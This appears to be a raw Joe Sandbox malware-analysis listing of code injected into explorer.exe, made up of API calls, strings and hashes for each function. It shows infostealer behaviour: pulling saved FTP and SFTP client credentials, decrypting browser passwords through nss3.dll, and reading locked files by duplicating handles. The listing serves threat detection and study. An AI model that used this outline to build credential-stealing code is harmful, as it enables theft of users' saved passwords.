                                                                                                                                                                • Instruction ID: e5be1bc1c602020e24381227df3f4a3a8854b1b5c32247c5a58f8663729f8857
                                                                                                                                                                • Opcode Fuzzy Hash: cbe8948d5ade575d44e794d1641bd9d9b11266bb2653815a7852c45f3c3c2737
                                                                                                                                                                • Instruction Fuzzy Hash: 37D0C2731082017BC3002B909C0AF2F773CAF98B00F080019F51091075D6B49850BBA1
                                                                                                                                                                APIs
                                                                                                                                                                • CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00C32893,00000000,00000000,00000000,?), ref: 00C31B82
                                                                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 00C31B8F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseCreateFileHandle
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3498533004-0
                                                                                                                                                                • Opcode ID: 894e210951f5325efbfd58de71bc8f307bc267c9fb006795d41352f95c8f9402
                                                                                                                                                                • Instruction ID: 86a328c84207c79957a2b4d2e3265afd4596a0aa7ff975ed3343ff7532805e1b
                                                                                                                                                                • Opcode Fuzzy Hash: 894e210951f5325efbfd58de71bc8f307bc267c9fb006795d41352f95c8f9402
                                                                                                                                                                • Instruction Fuzzy Hash: 67D012B126363067D57517357C0CFABAE1CDF026B9F080614B82DD90D0E2148D8786E8
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00C31162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00C3116F
                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00C31A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00C31AE2), ref: 00C31020
                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00C31AE2,PortNumber,00000000,00000000), ref: 00C31027
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Heap$FreeProcessQueryVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2580854192-0
                                                                                                                                                                • Opcode ID: 6ffd08348fbfe35d91ba3753dd1834ca3d2e95c24503b77463d6b06cd43e2ea1
                                                                                                                                                                • Instruction ID: 9c91a00bc1b6ed235454391914ebfbd595f0d8fd71b759cb896612c50d75dd97
                                                                                                                                                                • Opcode Fuzzy Hash: 6ffd08348fbfe35d91ba3753dd1834ca3d2e95c24503b77463d6b06cd43e2ea1
                                                                                                                                                                • Instruction Fuzzy Hash: E2C04C714152605AC96427A47D0DBCF7B19DF49362F090441BD1697153CA658C4187A4
                                                                                                                                                                APIs
                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,00C311C7,?,?,00000001,00000000,?), ref: 00C31003
                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C3100A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Heap$AllocateProcess
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1357844191-0
                                                                                                                                                                • Opcode ID: 070b225847e14b5cb6dba65b702496dedbea0c6da2edea013048e837f81312c7
                                                                                                                                                                • Instruction ID: 5f586fcf24401a2e664e86e0c5a5bf1612b1ec4d3d599d4b0cfac004370f1ab0
                                                                                                                                                                • Opcode Fuzzy Hash: 070b225847e14b5cb6dba65b702496dedbea0c6da2edea013048e837f81312c7
                                                                                                                                                                • Instruction Fuzzy Hash: 4BA001B5950204ABEE446BA4AE4EB1F3A29FB84B02F104544B246860A3DAA458048B29
                                                                                                                                                                APIs
                                                                                                                                                                • RtlZeroMemory.NTDLL(?,00000018), ref: 00C312B5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MemoryZero
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 816449071-0
                                                                                                                                                                • Opcode ID: 5ea4874631024b1c55c0109fefb030f374af15a5c5789ac4ac38fe8b4c893512
                                                                                                                                                                • Instruction ID: a8807299ace7721890d99eac6a2f95d0a7b5f9154b0e946809462fa0296ac06f
                                                                                                                                                                • Opcode Fuzzy Hash: 5ea4874631024b1c55c0109fefb030f374af15a5c5789ac4ac38fe8b4c893512
                                                                                                                                                                • Instruction Fuzzy Hash: 7311F5B1A01209AFDB10DFA9E988BAEB7BCEB08741F144029FD55E7241D731DE01CB64
                                                                                                                                                                APIs
                                                                                                                                                                • GetFileAttributesW.KERNELBASE(00000000,00000000,00C32C8F,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 00C31BAA
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                • Opcode ID: 0d61f6251080ef1b3dd0c92892ae752e2debd5652aaae4a2ccada9e663878cc4
                                                                                                                                                                • Instruction ID: a570849491aa9d55de6f41db26b2e513ac25754c058f14e890b649bbf33e8816
                                                                                                                                                                • Opcode Fuzzy Hash: 0d61f6251080ef1b3dd0c92892ae752e2debd5652aaae4a2ccada9e663878cc4
                                                                                                                                                                • Instruction Fuzzy Hash: 01D0A9B3E224308B8A6426383C04996E2846B007BC72E03B4FC36F30D0E224CE8243C4
                                                                                                                                                                APIs
                                                                                                                                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00C31684
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateGlobalStream
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2244384528-0
                                                                                                                                                                • Opcode ID: 2797e75e42461ab9fc25cc2c179ff480be364a474b1a9df1e85c11d7d4fa6530
                                                                                                                                                                • Instruction ID: 818b4b96351cc84d790231be0c258dfc5df1386f16c20fea489cc14ec0ec18ff
                                                                                                                                                                • Opcode Fuzzy Hash: 2797e75e42461ab9fc25cc2c179ff480be364a474b1a9df1e85c11d7d4fa6530
                                                                                                                                                                • Instruction Fuzzy Hash: F0C08C30120231DFE7301B708C0AB8A36E4EF197B2F0A0969F4C19D0C0E2F408C0CB90
                                                                                                                                                                APIs
                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00C3158A), ref: 00C31056
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                • Opcode ID: 0c426aad77155d419ef0b7c9a68e2d2c69b6ef82ff4a81e270d28752db4eec3c
                                                                                                                                                                • Instruction ID: 3484289c4ae4840396b7c1aeded7c0cbc8720b269c3a4675f47464b80a59db17
                                                                                                                                                                • Opcode Fuzzy Hash: 0c426aad77155d419ef0b7c9a68e2d2c69b6ef82ff4a81e270d28752db4eec3c
                                                                                                                                                                • Instruction Fuzzy Hash: 28A002F07D53007AFD6957A2AE1FF196D389741F02F100244B30D7C0D056E57500862D
                                                                                                                                                                APIs
                                                                                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00C34A5B,?,?,00000000,?,?,?,?,00C34B66,?), ref: 00C31065
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FreeVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1263568516-0
                                                                                                                                                                • Opcode ID: 1c346578963323db8e69ddeafccfc90c36256593c5fd11791821739cb825465f
                                                                                                                                                                • Instruction ID: e5afa00b82dd6d285afb489d8e92dabd1c7a562081041a1e179eb970171dacd7
                                                                                                                                                                • Opcode Fuzzy Hash: 1c346578963323db8e69ddeafccfc90c36256593c5fd11791821739cb825465f
                                                                                                                                                                • Instruction Fuzzy Hash: F3A0027069070066EDB457205D0EF0E26156740B01F2045447242AD0D249A5E0448B1C
                                                                                                                                                                APIs
                                                                                                                                                                • CreateFileW.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00000000,?,00000000), ref: 00C334C0
                                                                                                                                                                  • Part of subcall function 00C333C3: NtQueryInformationFile.NTDLL(00000000,00002000,00000000,00002000,0000002F), ref: 00C33401
                                                                                                                                                                • OpenProcess.KERNEL32(00000440,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00C337A8), ref: 00C334E9
                                                                                                                                                                  • Part of subcall function 00C31000: GetProcessHeap.KERNEL32(00000008,?,00C311C7,?,?,00000001,00000000,?), ref: 00C31003
                                                                                                                                                                  • Part of subcall function 00C31000: RtlAllocateHeap.NTDLL(00000000), ref: 00C3100A
                                                                                                                                                                • NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 00C3351E
                                                                                                                                                                • NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 00C33541
                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00C33586
                                                                                                                                                                • DuplicateHandle.KERNEL32(00000000,00000000,00000000), ref: 00C3358F
                                                                                                                                                                • lstrcmpiW.KERNEL32(00000000,File), ref: 00C335B6
                                                                                                                                                                • NtQueryObject.NTDLL(?,00000001,00000000,00001000,00000000), ref: 00C335DE
                                                                                                                                                                • StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 00C335F6
                                                                                                                                                                • StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 00C33606
                                                                                                                                                                • lstrcmpiW.KERNEL32(00000000,00000000), ref: 00C3361E
                                                                                                                                                                • GetFileSize.KERNEL32(?,00000000), ref: 00C33631
                                                                                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00C33658
                                                                                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 00C3366B
                                                                                                                                                                • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00C33681
                                                                                                                                                                • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00C336AD
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00C336C0
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,00C337A8), ref: 00C336F5
                                                                                                                                                                  • Part of subcall function 00C31C9F: CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00C31CC0
                                                                                                                                                                  • Part of subcall function 00C31C9F: WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00C31CDA
                                                                                                                                                                  • Part of subcall function 00C31C9F: CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00C31CE6
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,00C337A8), ref: 00C33707
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$HandleProcess$CloseQuery$InformationPointer$CreateHeaplstrcmpi$AllocateCurrentDuplicateObjectOpenReadSizeWrite
                                                                                                                                                                • String ID: File
                                                                                                                                                                • API String ID: 3915112439-749574446
                                                                                                                                                                • Opcode ID: 6f8e1b7f16321121bf35b92997e3f037675bf4e92309fb0bcbb35c2010e952e2
                                                                                                                                                                • Instruction ID: 8fbd49142ec01e844d39ef3c87c5a0e21f0b8c70e7ff5c2211cec4cd09245046
                                                                                                                                                                • Opcode Fuzzy Hash: 6f8e1b7f16321121bf35b92997e3f037675bf4e92309fb0bcbb35c2010e952e2
                                                                                                                                                                • Instruction Fuzzy Hash: 6F61BD70214340BFD720AF21CC89F2FBBE9FB88754F00082CF956962A2DB75DA449B59
                                                                                                                                                                APIs
                                                                                                                                                                • memcmp.NTDLL(localhost,00000007,00000009,00000002,?,00000000,000001D8,?,00000000), ref: 00C84502
                                                                                                                                                                • memcmp.NTDLL(00000000,?,?,00000002,?,00000000,000001D8,?,00000000), ref: 00C8475F
                                                                                                                                                                • memcpy.NTDLL(00000000,00000000,00000000,00000002,?,00000000,000001D8,?,00000000), ref: 00C84803
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcmp$memcpy
                                                                                                                                                                • String ID: %s mode not allowed: %s$access$cach$cache$file$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s
                                                                                                                                                                • API String ID: 231171946-1096842476
                                                                                                                                                                • Opcode ID: 4d5249d2cf9e89e47833c2a3f5195957ecd89bce14a613af37dce9ba7b66d52c
                                                                                                                                                                • Instruction ID: f6466aa289baf947cb51f5ea7b1817ec0d43348252822d44b5be3a079fcbfae3
                                                                                                                                                                • Opcode Fuzzy Hash: 4d5249d2cf9e89e47833c2a3f5195957ecd89bce14a613af37dce9ba7b66d52c
                                                                                                                                                                • Instruction Fuzzy Hash: 16C1E170A083539BDB38EF18849176BB7E1AB9A31CF14052EF4E587281E734DE45CB5A
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00C36AAA: memset.NTDLL ref: 00C36AC5
                                                                                                                                                                • memset.NTDLL ref: 00C55F53
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset
                                                                                                                                                                • String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"
                                                                                                                                                                • API String ID: 2221118986-594550510
                                                                                                                                                                • Opcode ID: b846fe53317e8534a3a2efa1b2b2b231b4517d24b94d24b340d30adaa75b08ba
                                                                                                                                                                • Instruction ID: 8986bd9b8240af5c1880fb3d1362b83f7e747e4f09cdf5bb6b6677d93141c181
                                                                                                                                                                • Opcode Fuzzy Hash: b846fe53317e8534a3a2efa1b2b2b231b4517d24b94d24b340d30adaa75b08ba
                                                                                                                                                                • Instruction Fuzzy Hash: C3C1AE74604701AFCB14DF25C880A2EB7E2BFC8715F44892DF85587282DB31D99ADB9A
                                                                                                                                                                APIs
                                                                                                                                                                • CoCreateInstance.COMBASE(00C862B0,00000000,00000001,00C862A0,?), ref: 00C3445F
                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 00C344AA
                                                                                                                                                                • lstrcmpiW.KERNEL32(RecentServers,?), ref: 00C3456E
                                                                                                                                                                • lstrcmpiW.KERNEL32(Servers,?), ref: 00C3457D
                                                                                                                                                                • lstrcmpiW.KERNEL32(Settings,?), ref: 00C3458C
                                                                                                                                                                  • Part of subcall function 00C311E1: lstrlenW.KERNEL32(?,7556F360,00000000,?,00000000,?,00C346E3), ref: 00C311ED
                                                                                                                                                                  • Part of subcall function 00C311E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00C3120F
                                                                                                                                                                  • Part of subcall function 00C311E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00C31231
                                                                                                                                                                • lstrcmpiW.KERNEL32(Server,?), ref: 00C345BE
                                                                                                                                                                • lstrcmpiW.KERNEL32(LastServer,?), ref: 00C345CD
                                                                                                                                                                • lstrcmpiW.KERNEL32(Host,?), ref: 00C34657
                                                                                                                                                                • lstrcmpiW.KERNEL32(Port,?), ref: 00C34679
                                                                                                                                                                • lstrcmpiW.KERNEL32(User,?), ref: 00C3469F
                                                                                                                                                                • lstrcmpiW.KERNEL32(Pass,?), ref: 00C346C5
                                                                                                                                                                • wsprintfW.USER32 ref: 00C3471E
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrcmpi$String$BinaryCrypt$AllocCreateInstancelstrlenwsprintf
                                                                                                                                                                • String ID: %s:%s$Host$LastServer$Pass$Port$RecentServers$Server$Servers$Settings$User
                                                                                                                                                                • API String ID: 2230072276-1234691226
                                                                                                                                                                • Opcode ID: 9b808cb691727767c1cbb76b491d6b711eae6c3df2bc8fbed7d19edabb14b1fc
                                                                                                                                                                • Instruction ID: 887e3859253278db2b7d8c48c706a40b83e6c7dd8d7917843c2eaabf89a03e1e
                                                                                                                                                                • Opcode Fuzzy Hash: 9b808cb691727767c1cbb76b491d6b711eae6c3df2bc8fbed7d19edabb14b1fc
                                                                                                                                                                • Instruction Fuzzy Hash: 42B10871204302AFD704DF64C884E6AB7F9EFCA759F00896CF5958B260DB71E946CB62
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00C31000: GetProcessHeap.KERNEL32(00000008,?,00C311C7,?,?,00000001,00000000,?), ref: 00C31003
                                                                                                                                                                  • Part of subcall function 00C31000: RtlAllocateHeap.NTDLL(00000000), ref: 00C3100A
                                                                                                                                                                  • Part of subcall function 00C31090: lstrlenW.KERNEL32(?,?,00000000,00C317E5), ref: 00C31097
                                                                                                                                                                  • Part of subcall function 00C31090: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000), ref: 00C310A8
                                                                                                                                                                  • Part of subcall function 00C319B4: lstrlenW.KERNEL32(00000000,00000000,00000000,00C32CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 00C319C4
                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000104,00000000), ref: 00C32503
                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(00000000), ref: 00C3250A
                                                                                                                                                                • LoadLibraryW.KERNEL32(00000000), ref: 00C32563
                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00C32570
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 00C32591
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 00C3259E
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SECITEM_FreeItem), ref: 00C325AB
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 00C325B8
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 00C325C5
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 00C325D2
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 00C325DF
                                                                                                                                                                  • Part of subcall function 00C3190B: lstrlen.KERNEL32(?,?,?,?,00000000,00C32783), ref: 00C3192B
                                                                                                                                                                  • Part of subcall function 00C3190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,00C32783), ref: 00C31930
                                                                                                                                                                  • Part of subcall function 00C3190B: lstrcat.KERNEL32(00000000,?), ref: 00C31946
                                                                                                                                                                  • Part of subcall function 00C3190B: lstrcat.KERNEL32(00000000,00000000), ref: 00C3194A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$lstrlen$CurrentDirectory$Heaplstrcat$AllocateByteCharLibraryLoadMultiProcessWide
                                                                                                                                                                • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$SECITEM_FreeItem$nss3.dll$sql:
                                                                                                                                                                • API String ID: 3366569387-3272982511
                                                                                                                                                                • Opcode ID: 4db564ff01ca26e3e43ec7c70afe483de24d6bedca2c4122eac9c22c501cb572
                                                                                                                                                                • Instruction ID: 81e3ac56d50ab936e21bf406e08ba9a50964dcee30917c6852dc77d2803b359b
                                                                                                                                                                • Opcode Fuzzy Hash: 4db564ff01ca26e3e43ec7c70afe483de24d6bedca2c4122eac9c22c501cb572
                                                                                                                                                                • Instruction Fuzzy Hash: C5412231A1031A8FCF14AFB59C5A76E7AE59F85B44F08003EFC5297262DB348D019B99
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00C35BF5: memset.NTDLL ref: 00C35C07
                                                                                                                                                                • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 00C360E1
                                                                                                                                                                • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 00C360EC
                                                                                                                                                                • _alldiv.NTDLL(?,?,000003E8,00000000), ref: 00C36113
                                                                                                                                                                • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 00C3618E
                                                                                                                                                                • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 00C361B5
                                                                                                                                                                • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 00C361C1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _alldiv$_allrem$memset
                                                                                                                                                                • String ID: %.16g$%02d$%03d$%04d$%06.3f$%lld$W
                                                                                                                                                                • API String ID: 2557048445-1989508764
                                                                                                                                                                • Opcode ID: b96c07b64fd57a05e1a00bb2d04e7ef2406a8e9cd9166bf9731ca16b7d9aabe9
                                                                                                                                                                • Instruction ID: 84c1242b977ccdaa18dc2e04de5450178ea62dc4c1552801ad1d089305f817d9
                                                                                                                                                                • Opcode Fuzzy Hash: b96c07b64fd57a05e1a00bb2d04e7ef2406a8e9cd9166bf9731ca16b7d9aabe9
                                                                                                                                                                • Instruction Fuzzy Hash: EEB1AFB1918742BBD735AE24CC85B3B7FD4FB84304F254A5DF492A61D1EA22CE108799
                                                                                                                                                                APIs
                                                                                                                                                                • memcmp.NTDLL(00C8637A,BINARY,00000007), ref: 00C4D324
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcmp
                                                                                                                                                                • String ID: %.16g$%lld$%s(%d)$(%.20s)$(blob)$,%d$,%s%s$BINARY$NULL$k(%d$program$vtab:%p
                                                                                                                                                                • API String ID: 1475443563-3683840195
                                                                                                                                                                • Opcode ID: db9286a019a545088d2d98baeb536a1480c298dbad51eee24c1537c7669329cf
                                                                                                                                                                • Instruction ID: 76ec5bd41fc49c40f96b6e965a9cc09892d33e2918c89809895d0537e06a0382
                                                                                                                                                                • Opcode Fuzzy Hash: db9286a019a545088d2d98baeb536a1480c298dbad51eee24c1537c7669329cf
                                                                                                                                                                • Instruction Fuzzy Hash: B9512071608300ABDB20FF65CC41A6AB3F5BF49704F540969F8938B261E770ED09DB96
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00C319E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00C31AE2,PortNumber,00000000,00000000), ref: 00C31A1E
                                                                                                                                                                  • Part of subcall function 00C319E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00C31A3C
                                                                                                                                                                  • Part of subcall function 00C319E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00C31A75
                                                                                                                                                                  • Part of subcall function 00C319E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00C31AE2,PortNumber,00000000,00000000), ref: 00C31A98
                                                                                                                                                                  • Part of subcall function 00C3482C: lstrlenW.KERNEL32(?), ref: 00C34845
                                                                                                                                                                  • Part of subcall function 00C3482C: lstrlenW.KERNEL32(?), ref: 00C3488F
                                                                                                                                                                  • Part of subcall function 00C3482C: lstrlenW.KERNEL32(?), ref: 00C34897
                                                                                                                                                                • wsprintfW.USER32 ref: 00C349A7
                                                                                                                                                                • wsprintfW.USER32 ref: 00C349B9
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrlen$QueryValuewsprintf$CloseOpen
                                                                                                                                                                • String ID: %s:%u$%s:%u/%s$HostName$Password$RemoteDirectory$UserName
                                                                                                                                                                • API String ID: 2889301010-4273187114
                                                                                                                                                                • Opcode ID: bee3696176a8804893960b96647711cd12ed1c4c6c8c3d220b23b91392c0b399
                                                                                                                                                                • Instruction ID: 6e82d516350db55d76c9b9d18e48ff2fd7e33e99b3c764f7ffbb7a15e541f205
                                                                                                                                                                • Opcode Fuzzy Hash: bee3696176a8804893960b96647711cd12ed1c4c6c8c3d220b23b91392c0b399
                                                                                                                                                                • Instruction Fuzzy Hash: 5C3122307203046BC718BBA5CC05F2FB6EDEFC9788F09491DB44187281DAB2ED4187A1
                                                                                                                                                                APIs
                                                                                                                                                                • memcpy.NTDLL(?,?,?,?,00000000), ref: 00C3FB32
                                                                                                                                                                • memcpy.NTDLL(?,?,00000000,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 00C3FB4D
                                                                                                                                                                • memcpy.NTDLL(?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 00C3FB60
                                                                                                                                                                • memcpy.NTDLL(?,?,?,?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030), ref: 00C3FB95
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
